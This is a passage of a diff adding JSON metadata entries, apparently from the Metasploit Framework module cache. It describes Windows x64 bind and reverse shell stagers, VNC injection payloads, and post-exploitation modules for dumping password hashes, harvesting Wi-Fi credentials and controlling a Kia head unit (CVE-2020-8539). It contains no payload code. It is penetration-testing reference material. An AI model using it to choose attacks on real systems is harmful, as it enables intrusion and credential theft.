"stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/shell/bind_tcp": { + "name": "Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/shell/bind_tcp_rc4": { + "name": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/shell/bind_tcp_uuid": { + "name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/shell/reverse_tcp": { + "name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/shell/reverse_tcp_rc4": { + "name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/shell/reverse_tcp_uuid": { + "name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/shell_bind_tcp": { + "name": "Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/windows/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Listen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/shell_reverse_tcp": { + "name": "Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/windows/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Connect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/vncinject/bind_ipv6_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/vncinject/bind_named_pipe": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/vncinject/bind_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/vncinject/bind_tcp_rc4": { + "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/vncinject/bind_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/vncinject/reverse_http": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/vncinject/reverse_https": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/vncinject/reverse_tcp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/vncinject/reverse_tcp_rc4": { + "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/vncinject/reverse_tcp_uuid": { + "name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/vncinject/reverse_winhttp": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/vncinject/reverse_winhttps": { + "name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "post_aix/hashdump": { + "name": "AIX Gather Dump Password Hashes", + "fullname": "post/aix/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "Post module to dump the password hashes for all users on an AIX system.", + "references": [], + "platform": "AIX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-26 16:28:15 +0000", + "path": "/modules/post/aix/hashdump.rb", + "is_install_path": true, + "ref_name": "aix/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/capture/screen": { + "name": "Android Screen Capture", + "fullname": "post/android/capture/screen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module takes a screenshot of the target phone.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/capture/screen.rb", + "is_install_path": true, + "ref_name": "android/capture/screen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/hashdump": { + "name": "Android Gather Dump Password Hashes for Android Systems", + "fullname": "post/android/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "timwr" + ], + "description": "Post Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.", + "references": [ + "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/", + "URL-https://hashcat.net/forum/thread-2202.html" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "android/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/sub_info": { + "name": "Extract Subscriber Info", + "fullname": "post/android/gather/sub_info", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus" + ], + "description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like IMEI, etc.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/sub_info.rb", + "is_install_path": true, + "ref_name": "android/gather/sub_info", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/gather/wireless_ap": { + "name": "Gather Wireless SSIDs and PSKs", + "fullname": "post/android/gather/wireless_ap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Auxilus", + "timwr" + ], + "description": "This module displays all wireless AP creds saved on the target device.", + "references": [], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 01:56:49 +0000", + "path": "/modules/post/android/gather/wireless_ap.rb", + "is_install_path": true, + "ref_name": "android/gather/wireless_ap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_android/local/koffee": { + "name": "KOFFEE - Kia OFFensivE Exploit", + "fullname": "post/android/local/koffee", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-12-02", + "type": "post", + "author": [ + "Gianpiero Costantino", + "Ilaria Matteucci" + ], + "description": "This module exploits CVE-2020-8539, which is an arbitrary code execution vulnerability that allows an to\n attacker execute the micomd binary file on the head unit of Kia Motors. This module has been tested on\n SOP.003.30.18.0703, SOP.005.7.181019 and SOP.007.1.191209 head unit software versions. This module, run on an\n active session, allows an attacker to send crafted micomd commands that allow the attacker to control the head\n unit and send CAN bus frames into the Multimedia CAN (M-Can) of the vehicle.", + "references": [ + "CVE-2020-8539", + "URL-https://sowhat.iit.cnr.it/pdf/IIT-20-2020.pdf" + ], + "platform": "Android", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/android/local/koffee.rb", + "is_install_path": true, + "ref_name": "android/local/koffee", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects", + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CAMERA_REVERSE_OFF", + "description": "It hides the parking camera video stream" + }, + { + "name": "CAMERA_REVERSE_ON", + "description": "It shows the parking camera video stream" + }, + { + "name": "CLUSTER_CHANGE_LANGUAGE", + "description": "It changes the cluster language" + }, + { + "name": "CLUSTER_RADIO_INFO", + "description": "It shows radio info in the instrument cluster " + }, + { + "name": "CLUSTER_RANDOM_NAVIGATION", + "description": "It shows navigation signals in the instrument cluster " + }, + { + "name": "CLUSTER_ROUNDABOUT_FARAWAY", + "description": "It shows a round about signal with variable distance in the instrument cluster " + }, + { + "name": "CLUSTER_SPEED_LIMIT", + "description": "It changes the speed limit shown in the instrument cluster" + }, + { + "name": "HIGH_SCREEN_BRIGHTNESS", + "description": "It increases the head unit screen brightness" + }, + { + "name": "INJECT_CUSTOM", + "description": "It injects custom micom payloads" + }, + { + "name": "LOW_FUEL_WARNING", + "description": "It pops up a low fuel message on the head unit" + }, + { + "name": "LOW_SCREEN_BRIGHTNESS", + "description": "It decreases the head unit screen brightness" + }, + { + "name": "MAX_RADIO_VOLUME", + "description": "It sets the radio volume to the max" + }, + { + "name": "NAVIGATION_FULL_SCREEN", + "description": "It pops up the navigation app window" + }, + { + "name": "REDUCE_RADIO_VOLUME", + "description": "It decreases the radio volume" + }, + { + "name": "SEEK_DOWN_SEARCH", + "description": "It triggers the seek down radio frequency search" + }, + { + "name": "SEEK_UP_SEARCH", + "description": "It triggers the seek up radio frequency search" + }, + { + "name": "SET_NAVIGATION_ADDRESS", + "description": "It pops up the navigation address window" + }, + { + "name": "SWITCH_OFF_HU", + "description": "It switches off the head unit" + }, + { + "name": "SWITCH_ON_HU", + "description": "It switches on the head unit" + }, + { + "name": "TOGGLE_RADIO_MUTE", + "description": "It mutes/umutes the radio" + } + ] + }, + "post_android/manage/remove_lock": { + "name": "Android Settings Remove Device Locks (4.0-4.3)", + "fullname": "post/android/manage/remove_lock", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-11", + "type": "post", + "author": [ + "CureSec", + "timwr" + ], + "description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric 